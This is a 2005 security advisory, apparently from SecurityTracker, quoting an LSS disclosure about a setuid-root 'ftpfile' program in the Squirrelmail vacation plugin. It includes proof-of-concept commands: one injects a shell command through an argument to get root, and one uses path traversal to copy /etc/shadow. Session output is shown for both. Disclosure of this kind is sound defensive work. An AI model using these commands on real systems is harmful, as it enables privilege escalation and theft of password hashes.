Squirrelmail Vacation Plugin Lets Local Users Execute Arbitrary Commands With Root Privileges
SecurityTracker Alert ID: 1012866|
SecurityTracker URL: http://securitytracker.com/id/1012866
(Links to External Site)
Date: Jan 13 2005
Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Root access via local system|
A vulnerability was reported in Squirrelmail in the vacation plugin. A local user can view arbitrary files and execute arbitrary commands.|
LSS reported that a local user can invoke the 'ftpfile' program to execute arbitrary commands with root privileges. The program, which is configured with set user id (setuid) root user privileges, does not properly validate user-supplied command line arguments before passing them to an execve() call. A demonstration exploit is provided:
ftpfile 0 root 0 get 0 "LSS-Security;id"
A local user can also invoke ftpfile to copy arbitrary files with root privileges to the user's home directory. A demonstratoin exploit is provided:
ftpfile localhost root root get ../../../../etc/shadow ./shadow
Leon Juranic is credited with discovering this flaw.
The vendor has been notified without response.
The original advisory is available at:
A local user can execute arbitrary commands with root privileges.|
A local user can copy arbitrary files with root privileges.
No solution was available at the time of this entry.|
Vendor URL: www.squirrelmail.org/ (Links to External Site)
Access control error, Input validation error|
|Underlying OS: Linux (Any), UNIX (Any)|
Source Message Contents
Subject: Squirrelmail vacation v0.15 local root exploit|
LSS Security Advisory #LSS-2005-01-03
Title : Squirrelmail vacation v0.15 local root exploit
Advisory ID : LSS-2005-01-03
Date : 10.01.2005.
Advisory URL: : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact : Privilege escalation and arbitrary file read
Risk level : High
Vulnerability type : Local
Vendors contacted : No response from vendor
Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message to incoming email. That is commonly used to notify the sender of
the receiver's absence. Vacation plugin specifically uses the Vacation program.
Plugin can be downloaded from:
Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.
The program is used to access local files in user's home directory. There is
a privilege escalation and arbitrary file read vulnerability in ftpfile.
Command line arguments are passed to execve() function without checking
for meta-characters, therefore making possible execution of commands as root.
[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from user's home directory to any other
directory without checking file name for directory traversal attack.
$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow[ljuranic@laptop ljuranic]$ head ./shadow
===[ Affected versions
Squirrelmail Vacation v0.15 and previous versions.
Not available yet.
===[ PoC Exploit
Credits for this vulnerability goes to Leon Juranic.
===[ LSS Security Contact
LSS Security Team, <eXposed by LSS>
WWW : http://security.lss.hr
E-mail : security@LSS.hr
Tel : +385 1 6129 775